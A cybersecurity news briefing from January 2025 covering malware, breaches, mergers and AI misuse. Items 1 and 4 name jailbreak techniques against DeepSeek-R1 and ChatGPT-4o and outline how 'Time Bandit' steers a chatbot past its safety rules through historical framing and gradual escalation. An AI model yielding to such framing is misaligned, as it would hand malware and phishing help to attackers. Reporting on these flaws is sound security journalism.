January 31 2025 – Cyber Briefing

👉 What are the latest cybersecurity alerts, incidents, and news?

DeepSeek Vulnerabilities, LLMs, Phorpiex Botnet, LockBit Ransomware, Malicious Browser Extensions, Hijack Browsers, Devices, Time Bandit Jailbreak, ChatGPT, OpenAI, Safety Features, Coyote Banking Trojan, Brazilian Banks, Crypto Platforms, Tata Technologies, Ransomware Attack, University of Notre Dame Australia, Tor Project, X Account, Cryptocurrency Scam, AngelSense, Disabled Users, Data Leak, ZAR Rehab Clinics, Germany, US Justice Department, HPE, Juniper, $14B Deal, Competition Concerns, Google AI, Nation-State Groups, Malicious Operations, Microsoft 365, Bug Bounty Program, Tenable, Vulcan Cyber, Exposure Management, AI-Driven Phishing, BEC.

Listen to the full podcast

🚨 Cyber Alerts

1. DeepSeek LLM Flaws Exposed by Jailbreak

Researchers have uncovered significant vulnerabilities in DeepSeek’s large language models (LLMs), specifically DeepSeek-R1, through advanced jailbreaking methods. These exploits, like “Bad Likert Judge,” “Crescendo,” and “Deceptive Delight,” demonstrate how easily attackers can bypass safety measures to generate harmful outputs. By manipulating the models, malicious actors were able to extract sensitive information or create malicious code, including keyloggers and data exfiltration scripts.

2. Phorpiex Powers LockBit Ransomware Attacks

Cybereason’s latest threat analysis uncovers the resurgence of the Phorpiex botnet, which is now being used to deliver LockBit ransomware. This marks a significant shift in cybercrime tactics as Phorpiex automates the deployment of LockBit without the usual lateral infections, making it more efficient and stealthy. Historically used for spam campaigns and cryptocurrency mining, Phorpiex’s new role in ransomware distribution highlights its evolving capabilities.

3. Malicious Extensions Allow Device Hijacking

SquareX has uncovered a new attack technique that leverages malicious browser extensions to gain full control of browsers and devices with minimal user interaction. These extensions, often masquerading as productivity tools, require just read/write permissions, which are commonly granted by users. Once the attacker compromises the extension, they can escalate privileges and conduct a full browser takeover by hijacking profiles and stealing user credentials. The attack technique, dubbed browser syncjacking, works by silently authenticating victims into a Chrome profile managed by the attacker.

4. Time Bandit Flaw Bypasses ChatGPT Safety

The “Time Bandit” jailbreak in OpenAI’s ChatGPT-4o allows attackers to bypass the AI’s built-in safety functions. Exploiting this vulnerability, attackers can manipulate the chatbot to produce dangerous content such as malware creation instructions and phishing scams. The flaw works by anchoring responses to a specific historical time period, allowing attackers to gradually steer the conversation toward illicit subjects without triggering safety guidelines.

5. Coyote Trojan Targets Brazilian Banks

Cybersecurity experts have uncovered a new wave of attacks using the Coyote Banking Trojan, which is specifically targeting financial institutions in Brazil. This sophisticated malware exploits Windows LNK files to trigger PowerShell scripts, initiating a multi-stage infection process that ends with data theft and system compromise. The Trojan is equipped with a range of capabilities including keylogging, screenshot capture, and phishing overlays mimicking banking interfaces, all while evading detection through modern tools like Nim and Node.js.

💥 Cyber Incidents

6. Tata Technologies Investigates Cyberattack

Tata Technologies Limited recently disclosed that it had fallen victim to a ransomware attack, which impacted certain IT assets. The company, headquartered in Pune, India, emphasized that the attack resulted in the temporary suspension of some of its IT services. However, it reassured its stakeholders that its core client delivery services remained fully operational and unaffected. The company issued an official statement on January 31, 2025, to notify the Bombay Stock Exchange (BSE) and the National Stock Exchange of India (NSE) about the breach, acknowledging that the incident had been taken seriously.

7. University of Notre Dame Faces Cyberattack

The University of Notre Dame Australia is currently investigating a cyberattack that has targeted its systems. The university has expressed its commitment to securing its infrastructure, stating that it is prioritizing the investigation and collaborating with government agencies like the Australian Cyber Security Centre. The university has assured its community, including staff and students, that updates will follow as the situation develops.

8. Tor Project X Account Hacked to Promote Scam

The Tor Project’s official X account was compromised on January 30, 2025, leading to the promotion of a fraudulent cryptocurrency scheme. The organization quickly issued a warning across other platforms, urging followers not to engage with any posts or links from the hacked account. As efforts to regain control of the account continue, the Tor Project emphasizes the importance of verifying information through official channels and staying cautious of phishing scams.

9. AngelSense Exposes Sensitive Data Online

AngelSense, a company providing assistive technology for people with disabilities, recently exposed the personal and sensitive information of its users to the open internet. Researchers from the security firm UpGuard alerted the company to the vulnerability, which had left a database unprotected and accessible through the internet. The exposed data included names, phone numbers, addresses, GPS coordinates, and sensitive health information, such as conditions like autism and dementia, all accessible without any password protection.

10. ZAR Rehab Data Leak Exposes Sensitive Data

A massive data leak at ZAR rehab clinics in Germany exposed highly sensitive patient information. The issue stemmed from the ZAR PAT app, which lacked transport encryption, allowing patient data, including medical reports and personal information, to be accessed in plain text. The breach affected hundreds of thousands of patients and exposed data such as names, birthdates, and detailed medical reports. The leak was discovered when a user of the app noticed the unencrypted data transmission and reported it to authorities.

📢 Cyber News

11. DOJ Moves to Block HPE Juniper Merger Deal

The Justice Department’s unexpected lawsuit against Hewlett Packard Enterprise’s (HPE) $14 billion acquisition of Juniper Networks marks the first such challenge under the new Trump administration. The department argues that combining the two companies would stifle competition and reduce innovation, which could ultimately lead to higher prices for customers. HPE and Juniper, however, have strongly opposed the move, claiming the merger would foster greater competition and offer customers more innovation and choice within the networking market.

12. AI Fuels Cyberattacks of 57+ Threats Groups

Over 57 threat actors from nations like China, Iran, North Korea, and Russia have been seen using Google’s AI tools to support their cyber operations. According to Google’s Threat Intelligence Group (GTIG), the AI is mainly used for research, code troubleshooting, and creating content for malicious campaigns. Iranian APT42, which has been the most active user of Gemini, uses AI for tasks like crafting phishing attacks and researching targets in the defense sector.

13. Microsoft Updates 365 Bug Bounty Program

Microsoft has announced significant updates to its Microsoft 365 Bug Bounty Program, now offering rewards between $500 and $27,000 for identifying critical vulnerabilities. The program invites global security researchers to submit vulnerabilities in services such as Office 365 and Microsoft Accounts. Researchers can earn increased bonuses for high-impact issues, including remote code execution or cross-tenant data leakage, with additional incentives for submissions made during special events like the “Zero Day Quest.”

14. Tenable Acquires Vulcan Cyber for $150M

Tenable has announced the acquisition of exposure management company Vulcan Cyber for $150 million. This strategic move is expected to close in the first quarter of 2025 and will significantly enhance Tenable’s exposure management platform. With Vulcan’s integration, Tenable will offer advanced AI capabilities, better risk prioritization, and automated remediation workflows, empowering customers to manage cyber risks more effectively and gain a comprehensive view of their security landscape.

15. Nine out of Ten Emails Were Spam in 2024

A recent report from VIPRE Security Group highlights the growing threat of AI-driven phishing and business email compromise (BEC) campaigns. With 9 out of 10 emails classified as spam globally in 2024, cybercriminals increasingly rely on sophisticated tactics, including word-perfect AI-generated phishing emails, subtle BEC scams, and well-crafted ploys that impersonate trusted vendors. The analysis, which covers 7.2 billion emails globally, reveals that 37% of spam emails were commercial, 32% were scams, and 21% were phishing attempts, underscoring the need for stronger defenses.